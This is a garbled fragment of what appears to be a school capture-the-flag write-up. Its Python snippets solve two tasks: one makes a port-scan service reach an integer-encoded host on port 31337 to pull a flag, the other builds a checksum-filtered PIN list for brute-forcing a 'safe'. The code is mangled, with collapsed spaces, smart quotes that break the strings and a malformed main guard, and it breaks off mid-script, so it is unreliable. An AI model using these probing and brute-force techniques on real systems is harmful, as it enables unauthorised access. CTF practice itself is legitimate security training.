Task URLCan you find it? Task URLdefip2long(ip): aton =inet_aton(ip) returnunpack(”!L",aton)[0] defmain(): URL ="http://portscan.task.school-CTF.org/port"IP =""HOST =ip2long(IP) PORT ="31337"print"Host : {}“.format(HOST) r =requests.post(URL,data={"host": HOST,"port": PORT}) raw_content =r.content flag =re.findall("SchoolCTF{.*?}“,raw_content) print"Flag : {}“.format(flag[0]) if__name__==’main‘: main() p.s. It seems that one of them said that they haven’t yet fully configured the security system and the password can be cracked. Safe URLdefa(pin): if(int(pin[0]) +int(pin[1]) +int(pin[2])) %10==int(pin[3]): returnpin else: returnNonepin_list =[] prod_pin =product("123456789",repeat=4) prod_pin =["“.join(x) forx inlist(prod_pin)] prod_pin =map(a,prod_pin) prod_pin =filter(None,prod_pin) prod_pin =list(set(prod_pin)) pin_list+=prod_pin